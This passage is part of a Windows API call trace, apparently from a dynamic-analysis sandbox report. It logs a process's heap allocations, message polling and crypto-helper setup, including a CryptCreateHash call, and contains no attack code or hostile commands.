hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0247.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0247.827] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0247.827] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.827] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0247.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54de8 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0247.828] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.828] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.828] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.828] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.828] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0247.829] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.829] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.829] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0247.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0247.829] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0247.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.829] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0247.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0247.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0247.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0247.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0247.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.832] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0247.832] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0247.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0247.833] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0247.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0247.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0247.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.834] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0247.834] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0247.834] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0247.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0247.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51748, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0247.835] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0247.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0247.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.836] 